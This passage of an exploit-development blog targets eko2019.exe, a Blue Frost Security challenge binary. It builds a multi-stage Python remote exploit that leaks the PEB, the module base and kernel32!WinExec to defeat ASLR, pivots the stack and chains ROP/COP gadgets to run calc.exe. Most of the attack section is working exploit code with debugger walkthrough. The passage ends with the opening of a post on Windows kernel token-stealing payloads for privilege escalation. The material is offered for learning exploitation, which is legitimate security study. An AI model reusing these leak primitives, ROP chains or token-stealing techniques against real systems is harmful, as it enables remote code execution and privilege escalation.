# 528 byte message + 16 byte header = 544 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()
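Every request from here on uses the same layout as the script above: the 16 byte header, 512 bytes of filler, the one byte we control, 7 bytes of padding, and then the 8 bytes that end up in RCX. Here is a minimal sketch of that layout as one helper, written for Python 3. The names build_request, HEADER, and TOTAL_LEN are made up for illustration, and the offsets are simply the ones found through trial and error in this post.

```python
import struct

HEADER = b"\x45\x6B\x6F\x32\x30\x31\x39\x00" + b"\x90" * 8  # same 16 bytes as above
TOTAL_LEN = 544                                              # 16 byte header + 528 byte message

def build_request(control_byte, rcx_value):
    """Build one request: control_byte lands in front of the mov, rcx_value lands in RCX."""
    payload = HEADER
    payload += b"\x41" * 512                  # filler up to the byte we control
    payload += control_byte                   # e.g. \x65 for the gs: prefix
    payload += b"\x41" * 7                    # padding up to the RCX value
    payload += struct.pack("<Q", rcx_value)   # little-endian QWORD loaded into RCX
    payload += b"\x41" * (TOTAL_LEN - len(payload))
    return payload

# Same bytes as the PEB request above: gs: prefix, RCX = 0x60
peb_request = build_request(b"\x65", 0x60)
print(len(peb_request))
```

Packing the RCX value with struct.pack also makes it clear that the trailing null bytes in the script above are really the upper bytes of the 64-bit value 0x60.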

As you can see from the image below, when we hit the move operation, we have the correct instruction in place.

RAX now contains the value of PEB!

In addition, our remote client has been able to save the PEB into a variable, which means we can always dynamically resolve this value. Note that this value will always change after the application (process) is restarted.

What is most devastating about identifying the PEB of eko2019.exe, is that the base address for the current process (eko2019.exe in this case) is located at an offset of PEB+0x10.

Essentially, all we have to do is use our ability to control RCX to load the value of PEB+0x10 into it. At that point, the application will extract that value into RAX (what PEB+0x10 points to). The data PEB+0x10 points to is the actual base virtual address for eko2019.exe! This value will then be returned to the client, via RAX. This will be done with a second request! Note that this time we do not need to access the GS segment register (in the second request). If you can recall, before we accessed the GS segment register, the program naturally executed a mov rax, qword ptr[rcx] instruction. To ensure this is the instruction executed this time, we will use our byte we control to implement a NOP- to slide into the intended instruction.

As mentioned earlier, we will close our first connection to the server, and then make a second request! This update to the exploit development process is outlined in the updated proof of concept.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 528 byte message + 16 byte header = 544 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to load PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

We hit our NOP and then execute it, sliding into our intended instruction.

We execute the above instruction- and we see a virtual address has been loaded into RAX! This is presumably the base address of eko2019.exe.

To verify this, let’s check what the base address of eko2019.exe is in WinDbg.

Awesome! We have successfully extracted the base virtual address of eko2019.exe and stored it in a variable on the remote client.

This means now, that when we need to execute our code in the future- we can dynamically resolve our ROP gadgets via offsets- and ASLR will no longer be a problem! The only question remains- how are we going to execute any code?

Mom, The Application Is Still Leaking!

For this blog post, we are going to pop calc.exe to verify code execution is possible. Since we are going to execute calc.exe as our proof of concept, using the Windows API function WinExec() makes the most sense to us. This is much easier than going through with a full VirtualProtect() function call, to make our code executable- since all we will need to do is pop calc.exe.

Since we already have the ability to dynamically resolve all of eko2019.exe’s virtual address space- let’s see if we can find any addresses within eko2019.exe that leak a pointer to kernel32.dll (where WinExec() resides) or WinExec() itself.

As you can see below, eko2019.exe+0x9010 actually leaks a pointer to WinExec()!

This is perfect, due to the fact we have a read primitive which extracts the value that a virtual address points to! In this case, eko2019.exe+0x9010 points to WinExec(). Again, we don’t need to push rcx or access any special registers like the GS segment register- we just want to extract the value that RCX points to (and we will fill RCX with eko2019.exe+0x9010). Let’s update our proof of concept with a third request, to leak the address of WinExec() in kernel32.dll.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 528 byte message + 16 byte header = 544 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to load PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 3rd stage

# 16 total bytes
print "[+] Sending the third header..."
exploit_3 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_3 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_3 += "\x90"

# Padding to load eko2019.exe+0x9010
exploit_3 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_3 += struct.pack('<Q', base_address+0x9010)

# Message needs to be 528 bytes total
exploit_3 += "\x41" * (544-len(exploit_3))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_3)

# Indexing the response to view RAX (VA of kernel32!WinExec)
receive_3 = s.recv(1024)
kernel32_unpack = struct.unpack_from('<Q', receive_3)
kernel32_winexec = kernel32_unpack[0]

print "[+] kernel32!WinExec is located at: {0}".format(hex(kernel32_winexec))

# Close the connection
s.close()

Landing on the move instruction, we can see that the address of WinExec() is about to be read from the location RCX points to!

When this instruction executes, the value will be loaded into RAX and then returned to us (the client)!

Do What You Can, With What You Have, Where You Are- Teddy Roosevelt

Recall up until this point, we have the following primitives:

  1. Write primitive- we can control the value of RCX, one byte around our mov instruction, and we can control a lot of the stack.
  2. Read primitive- we have the ability to read in values of pointers.

Using our ability to control RCX, we may have a potential way to pivot back to the stack. If you can recall from earlier, when we first increased our number of bytes from 512 to 528 and the \x41 byte was accessed BEFORE the mov rax, qword ptr [rcx] instruction was executed (which resulted in an access violation and a subsequent crash), the disassembler didn’t interpret \x41 as part of the mov rax, qword ptr [rcx] instruction- because that byte doesn’t combine with the bytes of said move instruction to form a variant of it.

Investigating a little bit more, we can recall that our move instruction is followed by a ret, which will pop the value located at RSP (the top of the stack) into RIP and continue execution there. Since we can control RCX- if we could find a way to place RCX at the top of the stack, we would return to that value and execute it, via the ret that exits the function call. What would make sense to us, is to load RCX with the address of a ROP gadget that would add rsp, X (which would make RSP point into our user controlled portion of the stack) and then start executing there! The question still remains however- even though we can control RCX, how are we going to execute what is in it?

After some trial and error, I finally came to a pretty neat conclusion! We can load RCX with the address of our stack pivot ROP gadget. We can then replace the \x41 byte from earlier (we changed this byte to \x65 in the PEB portion of this exploit) with a \x51 byte!

The \x51 byte is the opcode that corresponds to the push rcx instruction! Pushing RCX will allow us to place our user controlled value of RCX (the address of a stack pivot ROP gadget) onto the stack. Pushing an item onto the stack decrements RSP by 8 and writes said item to the location RSP now points to! This means that the address of our ROP gadget will sit at the top of the stack, and the ret instruction that leaves the function will pop it into RIP- which will execute our ROP gadget! The first step for us, is to find a ROP gadget! We will use rp++ to enumerate all ROP gadgets from eko2019.exe.
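To see why push rcx followed by ret hands control to whatever is in RCX, here is a toy model of the two instructions, written for Python 3. ToyCPU is a made-up class that only tracks RSP, RIP, and 8-byte stack slots- it is not an emulator, and both the gadget address and the starting RSP are hypothetical values. The mov rax, qword ptr [rcx] that sits between the two instructions is left out, since it does not touch the stack.

```python
class ToyCPU(object):
    """Minimal model of RSP, RIP and a stack made of 8-byte slots."""
    def __init__(self, rsp, rcx):
        self.rsp = rsp
        self.rcx = rcx
        self.rip = None
        self.memory = {}

    def push_rcx(self):
        # push: make room for one QWORD, then store RCX there
        self.rsp -= 8
        self.memory[self.rsp] = self.rcx

    def ret(self):
        # ret: load RIP from the top of the stack, then release the slot
        self.rip = self.memory[self.rsp]
        self.rsp += 8

gadget = 0x7ff6a000158b            # hypothetical address of the pivot gadget
cpu = ToyCPU(rsp=0x14fe00, rcx=gadget)
cpu.push_rcx()
cpu.ret()
print(hex(cpu.rip))
```

After the ret, RIP holds the value we put in RCX and RSP is back where it started, which is why the gadget we return into still needs to move RSP into memory we control.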

After running rp++, we find an ideal ROP gadget that will perform the stack pivot.

This gadget will raise the stack up in value, to load our user controlled values into RSP and subsequent bytes after RSP! Notice how each gadget does not show the full virtual address of the pointer. This is because of ASLR! If we look at the last 4 or so bytes, we can see that this is actually the offset from the base virtual address of eko2019.exe to said pointer. In this case, the ROP gadget we are going after is located at eko2019.exe + 0x158b.
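Turning an address from rp++ into something usable at runtime is just a subtraction and an addition. A minimal sketch, written for Python 3, assuming the static addresses are relative to an image base of 0x140000000 (consistent with sub_140001000 being eko2019.exe+0x1000). The names gadget_offset and rebase, as well as the leaked base value, are hypothetical.

```python
PREFERRED_BASE = 0x140000000   # assumption: base the static addresses are relative to

def gadget_offset(static_address, preferred_base=PREFERRED_BASE):
    """Distance from the start of the image to the gadget."""
    return static_address - preferred_base

def rebase(leaked_base, offset):
    """Address of the gadget in the running, ASLR-randomized process."""
    return leaked_base + offset

leaked_base = 0x7ff6a0000000   # hypothetical value returned by the second request
pivot = rebase(leaked_base, gadget_offset(0x14000158b))
print(hex(pivot))
```

Since ASLR moves the whole image as one unit, the offset stays the same across restarts- only the leaked base changes.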

Let’s update our proof of concept with the stack pivot implemented.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 528 byte message + 16 byte header = 544 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to load PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 3rd stage

print "[+] Sending the third header..."
exploit_3 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_3 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_3 += "\x90"

# Padding to load eko2019.exe+0x9010
exploit_3 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_3 += struct.pack('<Q', base_address+0x9010)

# Message needs to be 528 bytes total
exploit_3 += "\x41" * (544-len(exploit_3))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_3)

# Indexing the response to view RAX (VA of kernel32!WinExec)
receive_3 = s.recv(1024)
kernel32_unpack = struct.unpack_from('<Q', receive_3)
kernel32_winexec = kernel32_unpack[0]

print "[+] kernel32!WinExec is located at: {0}".format(hex(kernel32_winexec))

# Close the connection
s.close()

# 4th stage

# 16 total bytes
print "[+] Sending the fourth header..."
exploit_4 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_4 += "\x41" * 512

# push rcx (which we control)
exploit_4 += "\x51"

# Padding to load eko2019.exe+0x158b
exploit_4 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_4 += struct.pack('<Q', base_address+0x158b)

# Message needs to be 528 bytes total
exploit_4 += "\x41" * (544-len(exploit_4))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_4)

print "[+] Pivoted to the stack!"

# Don't need to index any data back through our read primitive, as we just want to stack pivot here
# Receiving data back from a connection is always best practice
s.recv(1024)

# Close the connection
s.close()

After executing the updated proof of concept, we continue execution to our move instruction as always. This time, we land on our intended push rcx instruction after executing the first three requests!

In addition, we can see RCX contains our specified ROP gadget!

After stepping through the push rcx instruction, we can see our ROP gadget has been placed at the top of the stack, where RSP points!

The next move instruction doesn’t matter to us at this point- as we are only worried about returning to the stack.

After we execute our ret to exit this function, we can clearly see that we have returned into our specified ROP gadget!

After we add to the value of RSP, we can see that when this ROP gadget returns- it will return into a region of memory that we control on the stack. We can view this via the Call stack in WinDbg.

Now that we have been able to successfully pivot back to the stack, it is time to attempt to pop calc.exe. Let’s start executing some useful ROP gadgets!

Recall that since we are working with the x64 architecture, we have to adhere to the __fastcall calling convention. As mentioned before, the registers we will use are:

  1. RCX -> First argument
  2. RDX -> Second argument
  3. R8 -> Third argument
  4. R9 -> Fourth argument
  5. RSP + 0x20 -> Fifth argument
  6. RSP + 0x28 -> Sixth argument
  7. etc.

A call to WinExec() is broken down as such, according to its documentation.

UINT WinExec(
  LPCSTR lpCmdLine,
  UINT   uCmdShow
);

This means that all we need to do, is place a value in RCX and RDX- as this function only takes two arguments.

Since we want to pop calc.exe, the first argument in this function should be a POINTER to an address that contains the string “calc”, which should be null terminated. This should be stored in RCX. lpCmdLine (the argument we are fulfilling) is the name of the application we would like to execute. Remember, this should be a pointer to the string.

The second argument, stored in RDX, is uCmdShow. These are the “display options”. The easiest option here, is to use SW_SHOWNORMAL- which just executes and displays the application normally. This means we will just need to place the value 0x1 into RDX, which is representative of SW_SHOWNORMAL.

Note- you can find all of these ROP gadgets from running rp++.

To start our ROP chain, we will just implement a “ROP NOP”, which will just return to the stack. This gadget is located at eko2019.exe+0x10a1.

exploit_4 += struct.pack('<Q', base_address+0x10a1)			# ret: eko2019.exe

The next thing we would like to do, is get a pointer to the string “calc” into RCX. In order to do this, we are going to need to have write permissions to a memory address. Then, using a ROP gadget, we can overwrite what this address points to with our own value of “calc”, which is null terminated. Looking in IDA, we see only one of the sections that make up our executable has write permissions.

This means that we need to pick an address from the .data section within eko2019.exe to overwrite. The address we will use is eko2019.exe+0xC288- as it is the first available “blank” address.

We will place this address into RCX, via the following ROP/COP gadgets:

exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0xc288)			# First empty address in eko2019.exe .data section
exploit_4 += struct.pack('<Q', base_address+0x6375)			# mov rcx, rax ; call r12: eko2019.exe

In this program, there was only one ROP gadget that allowed us to control RCX in the manner we wished- which was mov rcx, rax ; call r12. Obviously, this gadget will not return to the stack like a ROP gadget- but it will call a register afterwards. This is what is known as “Call-Oriented Programming”, or COP. You may be asking “this address will not return to the stack- how will we keep executing”? There is an explanation for this!

Essentially, before we use the COP gadget, we can pop a ROP gadget into the register that will be called (e.g. R12 in this case). Then, when the COP gadget is executed and the register is called- it will actually be performing a call to a ROP gadget we specify- which will be a return back to the stack in this case, via an add rsp, X instruction. Here is how this looks in totality.

# The next gadget is a COP gadget that does not return, but calls r12
# Placing an add rsp, 0x10 gadget to act as a "return" to the stack into r12
exploit_4 += struct.pack('<Q', base_address+0x4a8e)			# pop r12 ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0x8789)			# add rsp, 0x10 ; ret: eko2019.exe 

# Grabbing a blank address in eko2019.exe to write our calc string to and create a pointer (COP gadget)
# The blank address should come from the .data section, as IDA has shown this is the only section of the executable that is writeable
exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0xc288)			# First empty address in eko2019.exe .data section
exploit_4 += struct.pack('<Q', base_address+0x6375)			# mov rcx, rax ; call r12: eko2019.exe
exploit_4 += struct.pack('<Q', 0x4141414141414141)			# Padding from add rsp, 0x10

Great! This sequence will load a writeable address into the RCX register. The task now, is to somehow overwrite what this address is pointing to.
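The reason the gadget in R12 is add rsp, 0x10 (and the reason for the single QWORD of padding) comes down to bookkeeping: the call pushes an 8 byte return address we don’t care about, so RSP has to skip that plus one more slot before the ret. Here is a toy walk-through, written for Python 3. The function simulate_cop_return is a made-up name, and the stack addresses and string placeholders are illustrative only.

```python
def simulate_cop_return(stack, rsp):
    """stack: dict of address -> QWORD, rsp: value when the COP gadget starts executing."""
    rsp -= 8                                     # call r12 pushes a return address
    stack[rsp] = "return address pushed by call r12"
    rsp += 0x10                                  # add rsp, 0x10 skips it plus one more QWORD
    rip = stack[rsp]                             # ret loads the next chain entry
    rsp += 8
    return rip, rsp

stack = {
    0x1000: 0x4141414141414141,   # padding QWORD placed right after the COP gadget
    0x1008: "next gadget",        # the chain entry we want to run next
}
rip, rsp = simulate_cop_return(stack, 0x1000)
print(rip, hex(rsp))
```

The padding QWORD is the slot that gets skipped, and the chain carries on as if the COP gadget had ended in a normal ret.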

We stumble across another interesting ROP gadget that can help us achieve this goal!

mov qword [rcx], rax ; mov eax, 0x00000001 ; add rsp, 0x0000000000000080 ; pop rbx ; ret

This ROP gadget is from kernel32.dll. As you can recall, WinExec() is exported by kernel32.dll. This means we already have a valid address within kernel32.dll. Knowing this, we can find the distance between WinExec() and the base of kernel32.dll- which would allow us to dynamically resolve the base virtual address of kernel32.dll.

kernel32_base = kernel32_winexec-0x5e390

WinExec() is 0x5e390 bytes into kernel32.dll (on this version of Windows 10). Subtracting this value will give us the base address of kernel32.dll! Now that we have resolved the base, this will allow us to calculate the offset and virtual memory address of our gadget in kernel32.dll dynamically.
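Because the 0x5e390 offset is tied to one specific build of kernel32.dll, it is worth sanity checking the result before building a ROP chain on top of it. Here is a minimal sketch, written for Python 3. The helper name resolve_module_base and the leaked pointer value are hypothetical- the check relies on Windows mapping images on 64 KB boundaries, so a correctly resolved base has its low 16 bits clear.

```python
WINEXEC_OFFSET = 0x5e390   # from this post, specific to this build of kernel32.dll

def resolve_module_base(leaked_export, export_offset):
    """Subtract the export's offset and make sure the result looks like an image base."""
    base = leaked_export - export_offset
    if base & 0xFFFF:
        raise ValueError("offset does not match this build: {0}".format(hex(base)))
    return base

kernel32_winexec = 0x7ffd1239e390          # hypothetical pointer leaked by the third request
kernel32_base = resolve_module_base(kernel32_winexec, WINEXEC_OFFSET)
write_gadget = kernel32_base + 0x6130f     # gadget offset used in this post
print(hex(kernel32_base))
```

If the target is running a different kernel32.dll, the check will most likely fail loudly instead of letting the exploit return into a garbage address.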

Looking back at our ROP gadget- this gives us the ability to take the value in RAX and move it into the value POINTED TO by RCX. RCX already contains the address we would like to overwrite- so this is a perfect match! All we need to do now, is load the string “calc” (null terminated) into RAX! Here is what this looks like all put together.

# Creating a pointer to calc string
exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += "calc\x00\x00\x00\x00"					# calc (with null terminator)
exploit_4 += struct.pack('<Q', kernel32_base+0x6130f)		        # mov qword [rcx], rax ; mov eax, 0x00000001 ; add rsp, 0x0000000000000080 ; pop rbx ; ret: kernel32.dll

# Padding for add rsp, 0x0000000000000080 and pop rbx
exploit_4 += "\x41" * 0x88

One thing to keep in mind is that the ROP gadget that creates the pointer to “calc” (null terminated) has a few extra instructions on the end that we needed to compensate for.

The second parameter is much more straightforward. In kernel32.dll, we found another gadget that allows us to pop our own value into RDX.
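The 0x88 bytes of padding come straight from those extra instructions: 0x80 for the add rsp, plus 8 for the pop rbx. A small sketch of that arithmetic, written for Python 3 (padding_after is a made-up helper name):

```python
def padding_after(add_rsp=0, pops=0):
    """Filler needed between a gadget and the next chain entry."""
    return b"\x41" * (add_rsp + 8 * pops)

# mov qword [rcx], rax ; mov eax, 1 ; add rsp, 0x80 ; pop rbx ; ret
pad = padding_after(add_rsp=0x80, pops=1)
print(hex(len(pad)))
```

The same rule covers gadgets such as add rsp, 0x48 ; ret, where the filler is simply 0x48 bytes.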

# Placing second parameter into rdx
exploit_4 += struct.pack('<Q', kernel32_base+0x19daa)		# pop rdx ; add eax, 0x15FF0006 ; ret: kernel32.dll
exploit_4 += struct.pack('<Q', 0x01)			        # SW_SHOWNORMAL

Perfect! At this point, all we need to do is place the call to WinExec() on the stack! This is done with the following snippet of code.

# Calling kernel32!WinExec
exploit_4 += struct.pack('<Q', base_address+0x10a1)		# ret: eko2019.exe (ROP NOP)
exploit_4 += struct.pack('<Q', kernel32_winexec)	        # Address of kernel32!WinExec

In addition, we need to return to a valid address on the stack after the call to WinExec() so our program doesn’t crash after calc.exe is called. This is outlined below.

exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x2e71)			# add rsp, 0x38 ; ret: eko2019.exe

The final exploit code can be found here on my GitHub.

Let’s step through this final exploit in WinDbg to see how things break down.

We have already shown that our stack pivot was successful. After the pivot back to the stack and our ROP NOP which just returns back to the stack is executed, we can see that our pop r12 instruction has been hit. This will load a ROP gadget into R12 that will return to the stack- due to the fact our main ROP gadget calls R12, as explained earlier.

After we step through the instruction, we can see our ROP gadget for returning back to the stack has been loaded into R12.

We hit our next gadget, which pops the writeable address in the .data section of eko2019.exe into RAX. This value will be eventually placed into the RCX register- where the first function argument for WinExec() needs to be.

RAX now contains the blank, writeable address in the .data section.

After this gadget returns, we hit our main gadget of mov rcx, rax ; call r12.

The value of RAX is then placed into RCX. After this occurs, we can see that R12 is called and is going to execute our return back to the stack, add rsp, 0x10 ; ret.

Perfect! Our COP gadget and ROP gadgets worked together to load our intended address into RCX.

Next, we execute our next pop rax gadget, which loads the null-terminated string “calc” into RAX. The register shows 636c6163, which reads as “clac” when converted from hex to text. This is because we are compensating for the endianness of our processor (little endian).
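
To make the endianness point concrete, here is a minimal sketch in Python (the same language as the exploit script). The variable names are only for illustration; the value is the one shown in the register above.

```python
import struct

# The QWORD that the pop rax gadget loads, written the way the debugger shows it.
value = 0x636c6163

# '<Q' packs an unsigned 64-bit integer in little-endian byte order,
# the same format string the exploit script uses for every stack entry.
in_memory = struct.pack('<Q', value)

# Lowest-order byte first: 0x63 'c', 0x61 'a', 0x6c 'l', 0x63 'c'.
# The four upper zero bytes double as the null terminator.
print(repr(in_memory))
```

Read as a number the value looks like “clac”, but the bytes land in memory as “calc” followed by zeros, which is what WinExec() will see.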

We land on our most important ROP gadget to date after the return from the above gadget. This will take the string “calc” (null terminated) and point the address in RCX to it.

The address in RCX now points to the null terminated string “calc”.

Perfect! All we have to do now, is pop 0x1 into RDX- which has been completed by the subsequent ROP gadget.

Perfect! We have now landed on the call to WinExec()- and we can execute our shellcode!

All that is left to do now, is let everything run as intended!

Let’s run the final exploit.

Calc.exe FTW!

Big shoutout to Blue Frost Security for this binary- this was a very challenging experience and I feel I learned a lot from it. A big shout out as well to my friend @trickster012 for helping me with some of the problems I was having with __fastcall initially. Please contact me with any comments, questions, or corrections.

Peace, love, and positivity :-)

Exploit Development: Panic! At The Kernel - Token Stealing Payloads Revisited on Windows 10 x64 and Bypassing SMEP

1 February 2020 at 00:00

Introduction

Same ol’ story with this blog post- I am continuing to expand my research/overall knowledge on Windows kernel exploitation, in addition to garnering more experience with exploit development in general. Previously I have talked about a couple of vulnerability classes on Windows 7 x86, which is an OS with minimal protections. With this post, I wanted to take a deeper dive into token stealing payloads, which I have previously talked about on x86, and see what differences the x64 architecture may have. In addition, I wanted to try to do a better job of explaining how these payloads work. This post and research also aims to get myself more familiar with the x64 architecture, which is far more common in 2020, and understand protections such as Supervisor Mode Execution Prevention (SMEP).

Gimme Dem Tokens!

As a part of Windows, there is something known as the SYSTEM process. The SYSTEM process, PID of 4, houses the majority of kernel mode system threads. The threads stored in the SYSTEM process only run in the context of kernel mode. Recall that a process is a “container”, of sorts, for threads. A thread is the actual item within a process that performs the execution of code. You may be asking “How does this help us?”, especially if you did not see my last post. In Windows, each process object, known as _EPROCESS, has something known as an access token. Recall that an object is a dynamically created (configured at runtime) structure. Continuing on, this access token determines the security context of a process or a thread. Since the SYSTEM process houses execution of kernel mode code, it will need to run in a security context that allows it to access the kernel. This would require system or administrative privilege. This is why our goal will be to identify the access token value of the SYSTEM process and copy it to a process that we control, or the process we are using to exploit the system. From there, we can spawn cmd.exe from the now privileged process, which will grant us NT AUTHORITY\SYSTEM privileged code execution.

Identifying the SYSTEM Process Access Token

We will use Windows 10 x64 to outline this overall process. First, boot up WinDbg on your debugger machine and start a kernel debugging session with your debuggee machine (see my post on setting up a debugging environment). In addition, I noticed on Windows 10, I had to execute the following command on my debugger machine after completing the bcdedit.exe commands from my previous post: bcdedit.exe /dbgsettings serial debugport:1 baudrate:115200

Once that is setup, execute the following command, to dump the active processes:

!process 0 0

